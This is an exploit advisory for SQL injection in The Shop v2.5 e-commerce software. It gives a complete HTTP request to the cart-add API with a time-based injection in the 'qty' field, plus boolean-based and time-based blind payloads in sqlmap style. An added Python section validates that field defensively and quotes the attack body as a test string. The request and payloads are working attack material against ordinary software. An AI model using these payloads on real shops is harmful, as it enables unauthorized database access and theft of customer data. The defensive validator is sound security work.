# Exploit Title: The Shop v2.5 - SQL Injection
# Date: 2023-06-17
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor: https://codecanyon.net/item/the-shop/34858541
# Demo Site: https://shop.activeitzone.com
# Tested on: Kali Linux
# CVE: N/A


### Request ###

POST /api/v1/carts/add HTTP/1.1
Content-Type: application/json
Accept: application/json, text/plain, */*
x-requested-with: XMLHttpRequest
x-xsrf-token: xjwxipuDENxaHWGfda1nUZbX1R155JZfHD5ab8L4
Referer: https://localhost
Cookie: XSRF-TOKEN=LBhB7u7sgRN4hB3DB3NSgOBMLE2tGDIYWItEeJGL; the_shop_session=iGQJNeNlvRFGYZvsVowWUMDJ8nRL2xzPRXhT93h7
Content-Length: 81
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
Host: localhost
Connection: Keep-alive

{"variation_id":"119","qty":"if(now()=sysdate(),sleep(6),0)","temp_user_id":null}


### Parameter & Payloads ###

Parameter: JSON qty ((custom) POST)
    Type: boolean-based blind
    Title: Boolean-based blind - Parameter replace (original value)
    Payload: {"variation_id":"119","qty":"(SELECT (CASE WHEN (4420=4420) THEN 'if(now()=sysdate(),sleep(6),0)' ELSE (SELECT 3816 UNION SELECT 4495) END))","temp_user_id":null}

    Type: time-based blind
    Title: MySQL > 5.0.12 OR time-based blind (heavy query)
    Payload: {"variation_id":"119","qty":"if(now()=sysdate(),sleep(6),0) OR 2614=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C)","temp_user_id":null}
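
A defensive check for the `qty` parameter reported above, as an added example that is not part of the original advisory or the vendor's code: a strict type validator for the `/api/v1/carts/add` JSON body that a gateway, middleware or log filter could apply before the value reaches any query. The function names, the digit-length bound and `MAX_QTY` are assumptions made for illustration.

```python
import json
import re

# Assumption: both fields are meant to carry small positive integers. The
# request in the advisory sends them as JSON strings ("119"), so digit-only
# strings are accepted alongside JSON integers.
_DIGITS = re.compile(r"[0-9]{1,9}")
MAX_QTY = 1000  # hypothetical business limit, not taken from the product
# Request body quoted in the advisory, and a constructed benign body.
ADVISORY_BODY = '{"variation_id":"119","qty":"if(now()=sysdate(),sleep(6),0)","temp_user_id":null}'
BENIGN_BODY = '{"variation_id":"119","qty":"2","temp_user_id":null}'


def _as_int(value, field):
    """Return value as int if it is a JSON integer or a digit-only string."""
    if isinstance(value, bool):  # bool is a subclass of int in Python
        raise ValueError(f"{field}: boolean not allowed")
    if isinstance(value, int):
        number = value
    elif isinstance(value, str) and _DIGITS.fullmatch(value):
        number = int(value)
    else:
        raise ValueError(f"{field}: not an integer")
    if number < 1:
        raise ValueError(f"{field}: must be >= 1")
    return number


def validate_cart_add(raw_body):
    """Parse a cart-add body and return typed values, or raise ValueError."""
    try:
        body = json.loads(raw_body)
    except json.JSONDecodeError as exc:
        raise ValueError("body is not valid JSON") from exc
    if not isinstance(body, dict):
        raise ValueError("body must be a JSON object")
    qty = _as_int(body.get("qty"), "qty")
    if qty > MAX_QTY:
        raise ValueError("qty: above limit")
    variation_id = _as_int(body.get("variation_id"), "variation_id")
    return {"variation_id": variation_id, "qty": qty}


def is_rejected(raw_body):
    """True when the body fails validation and should be refused or flagged."""
    try:
        validate_cart_add(raw_body)
        return False
    except ValueError:
        return True
```

Type validation of this kind narrows what reaches the database; the query that consumes `qty` should still pass it as a bound parameter rather than concatenating it into SQL.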